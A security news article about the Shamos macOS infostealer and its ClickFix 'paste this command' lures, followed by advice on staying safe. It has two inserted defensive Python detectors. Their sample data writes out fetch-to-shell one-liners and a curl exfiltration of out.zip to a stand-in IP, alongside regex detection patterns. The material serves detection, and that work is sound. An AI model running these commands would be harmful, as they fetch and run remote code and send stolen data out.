Macs under attack from dangerous new info-stealing malware — how to stay safe

MacBook Pro 2021 (16-inch) on a patio table
(Image credit: Tom's Guide)

‘Shamos’ is a new infostealer targeting Macs, and it's the latest in a long list of malware taking advantage of ClickFix-style attacks, which trick users into running malicious commands disguised as fixes for common problems or as legitimate software installs.

Bleeping Computer reports that Shamos is a variant of AMOS (or the Atomic macOS Stealer) and was developed by the COOKIE SPIDER cybercriminal group. It disguises itself as a guide, manual or troubleshooting fix online in order to fool users into downloading it so it can steal sensitive data and credentials from their browsers, as well as Keychain items, Apple Notes and cryptocurrency wallets.

CrowdStrike first detected Shamos, and according to the cybersecurity firm, attackers have attempted to infect more than 300 of the environments it monitors with this new strain since June. It spreads through malvertising and fake GitHub repositories using ClickFix attacks, which prompt targets to paste shell commands into the macOS Terminal. The lure is that running the command will ‘fix’ an error or install a piece of software; in reality, the victim is infecting their own machine with info-stealing malware.

CrowdStrike found several spoofed pages, such as mac-safer[.]com and rescue-mac[.]com, that claim to help with common macOS problems people often search for. The pages instruct users to copy and paste a command to ‘fix’ the issue. Instead of repairing anything, the pasted one-liner decodes a Base64-encoded URL and fetches a malicious Bash script from it. That script captures the user's password, downloads the Shamos Mach-O executable, and then runs the malware.

Once installed, it runs data-collection commands to harvest information from the infected device: cryptocurrency wallet files, Keychain data, Apple Notes and data stored in the browser. It packages everything it steals into an archive named out.zip and sends it back to the operators using curl.
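The two telltale patterns described above (a pasted one-liner that Base64-decodes a URL and pipes the fetched script into a shell, and a curl upload of out.zip) are easy to hunt for in shell history or EDR process-command-line telemetry. The following is an added example, not code from the article or from CrowdStrike: it scans a constructed set of command lines, tags the suspicious ones, and recovers the URL hidden in the Base64 blob. The sample commands, the Base64 blob (built from a domain the article names, with an assumed path of /fix.sh) and the upload IP are all constructed for illustration and are not real indicators.

```python
import base64
import re

# Constructed sample of command lines, as a shell-history collector or EDR would record them.
# The Base64 blob encodes a URL built from a domain named in the article; the "/fix.sh" path
# and the 198.51.100.7 upload address are assumptions for illustration, not real IOCs.
FAKE_URL = "https://rescue-mac.com/fix.sh"
FAKE_B64 = base64.b64encode(FAKE_URL.encode()).decode()

SAMPLE_EVENTS = [
    "ls -la ~/Downloads",
    f'echo "{FAKE_B64}" | base64 -d | xargs curl -fsSL | bash',
    "curl -fsSL https://example.invalid/install.sh | sh",
    "brew install wget",
    "curl -s -X POST -F 'file=@/tmp/out.zip' http://198.51.100.7/upload",
    "zip -r out.zip ~/Library/Keychains",
]

# ClickFix shape 1: base64 decoding (macOS accepts -d, -D or --decode) feeding a shell.
B64_TO_SHELL = re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(bash|sh|zsh)\b")
# ClickFix shape 2: a remote fetch piped straight into a shell.
FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(bash|sh|zsh)\b")
# Exfiltration shape from the article: curl uploading an archive named out.zip.
UPLOAD_OUT_ZIP = re.compile(r"\bcurl\b.*(-F|--form|-T|--upload-file|--data-binary)\s*\S*out\.zip")
# Candidate Base64 blobs worth trying to decode (16+ chars of the Base64 alphabet).
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_urls(cmd):
    """Decode every Base64-looking blob in cmd and return those that decode to a URL."""
    urls = []
    for blob in B64_BLOB.findall(cmd):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or not text: ignore
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls


def classify(cmd):
    """Return the list of suspicious patterns a single command line matches."""
    findings = []
    if B64_TO_SHELL.search(cmd):
        findings.append("base64-decode piped to shell")
    if FETCH_TO_SHELL.search(cmd):
        findings.append("remote fetch piped to shell")
    if UPLOAD_OUT_ZIP.search(cmd):
        findings.append("curl upload of out.zip")
    return findings


def scan(events):
    """Map each suspicious command to its tags and any URL recovered from Base64."""
    hits = {}
    for cmd in events:
        tags = classify(cmd)
        if tags:
            hits[cmd] = {"tags": tags, "urls": decoded_urls(cmd)}
    return hits


if __name__ == "__main__":
    for cmd, info in scan(SAMPLE_EVENTS).items():
        print(f"{info['tags']} urls={info['urls']}\n    {cmd}")
```

The same three regexes work as a starting point for a query over EDR process-creation events on the command-line field; decoding the blob is what lets you pivot from a single paste to the hosting domain and block it.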

ClickFix style attacks have become increasingly popular in malware distribution and have been found in a variety of places from TikTok videos, CAPTCHAS or fixes for fake Google Meet errors. They’re popping up more and more frequently because they’ve been successful in spreading malware, in ransomware attacks and even in state-sponsored attacks launched by more sophisticated hackers.

The malware can also establish persistence so that it runs automatically at system startup (in cases where it was run with sudo privileges), and it can download additional payloads into the victim’s home directory: CrowdStrike has observed the threat actors additionally dropping a spoofed Ledger Live wallet app and a botnet module.
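A practical check for the persistence and home-directory payloads described above is to audit the launchd startup items for anything set to run at boot from a user-writable location. This is an added example, not code from the article or from CrowdStrike, and it assumes the startup mechanism is a launchd plist (the usual way to auto-run something at startup on macOS; the article does not say which mechanism Shamos uses). It parses plists with the standard library and flags RunAtLoad/KeepAlive entries whose program lives under /Users, /tmp or the per-user temp folders. The plists in demo() are constructed sample data, not real indicators.

```python
import os
import plistlib
import tempfile
from pathlib import Path

# Standard launchd search paths. Assumption: a startup item dropped by the malware would be
# a plist in one of these, as the article only says it "runs on system startup".
LAUNCH_DIRS = [
    "/Library/LaunchDaemons",
    "/Library/LaunchAgents",
    os.path.expanduser("~/Library/LaunchAgents"),
]

# Locations a legitimate startup item rarely executes from.
SUSPECT_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")


def program_of(plist):
    """Return the executable path a launchd plist would run, or None if it has none."""
    prog = plist.get("Program")
    if isinstance(prog, str):
        return prog
    args = plist.get("ProgramArguments") or []
    return args[0] if args and isinstance(args[0], str) else None


def inspect_plist(path):
    """Return a finding if the plist auto-runs a program from a suspect location, else None."""
    try:
        with open(path, "rb") as f:
            plist = plistlib.load(f)
    except Exception:
        # Malformed plists in a launchd directory are themselves worth a look.
        return {"path": str(path), "reason": "unparseable plist"}
    prog = program_of(plist)
    if prog is None:
        return None
    runs_at_boot = bool(plist.get("RunAtLoad")) or bool(plist.get("KeepAlive"))
    if runs_at_boot and prog.startswith(SUSPECT_PREFIXES):
        return {"path": str(path), "label": plist.get("Label"), "program": prog}
    return None


def audit(dirs=LAUNCH_DIRS):
    """Inspect every *.plist in the given directories and collect findings."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for p in sorted(Path(d).glob("*.plist")):
            finding = inspect_plist(p)
            if finding:
                findings.append(finding)
    return findings


def demo():
    """Write two constructed plists (sample data, not real IOCs) to a temp dir and audit them."""
    with tempfile.TemporaryDirectory() as tmp:
        benign = {
            "Label": "com.example.updater",
            "ProgramArguments": ["/usr/local/bin/updater"],
            "RunAtLoad": True,
        }
        suspect = {
            "Label": "com.fake.helper",
            "ProgramArguments": ["/Users/victim/.helper/helper", "--silent"],
            "RunAtLoad": True,
        }
        for name, data in (("com.example.updater.plist", benign), ("com.fake.helper.plist", suspect)):
            with open(os.path.join(tmp, name), "wb") as f:
                plistlib.dump(data, f)
        return audit([tmp])


if __name__ == "__main__":
    for finding in audit():  # real directories on this machine
        print(finding)
    print("demo:", demo())
```

On a real Mac, run audit() with the default directories and compare the hits against `launchctl list`; anything flagged can then be checked with `codesign -dv --verbose` on the program path before you decide whether it is an unsigned dropped payload.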

How to stay safe from Mac malware

A padlock resting next to the Apple logo on the lid of a gold-colored Apple laptop.

(Image credit: robert coolen/Shutterstock)

If you are a macOS user, do not execute commands on your system if you found them online, especially if you don't fully understand what they are, where they come from and what they do.

This also applies to commands and installers found in GitHub repositories: the platform is known to host malicious projects aimed at users who download and run them without checking what they actually do.

If you are experiencing issues with macOS, avoid sponsored search results and seek help directly from the Apple Community forums which are moderated by Apple or via the system’s built-in Help menu.

Also, the best Mac antivirus software adds an extra layer of protection against malware. Paid antivirus apps often bundle extra features to help protect your privacy and security online, such as a VPN, a password manager or a hardened browser for financial transactions.

Given how successful they've been in the past and how they have victims infect their own devices with malware, ClickFix attacks aren't going anywhere anytime soon. Hopefully Apple and Microsoft come up with a way to mitigate them but until then, it's up to you to be extra careful online and avoid falling for these kinds of attacks.


Amber Bouman
Senior Editor Security

Amber Bouman is the senior security editor at Tom's Guide where she writes about antivirus software, home security, identity theft and more. She has long had an interest in personal security, both online and off, and also has an appreciation for martial arts and edged weapons. With over two decades of experience working in tech journalism, Amber has written for a number of publications including PC World, Maximum PC, Tech Hive, and Engadget covering everything from smartphones to smart breast pumps. 
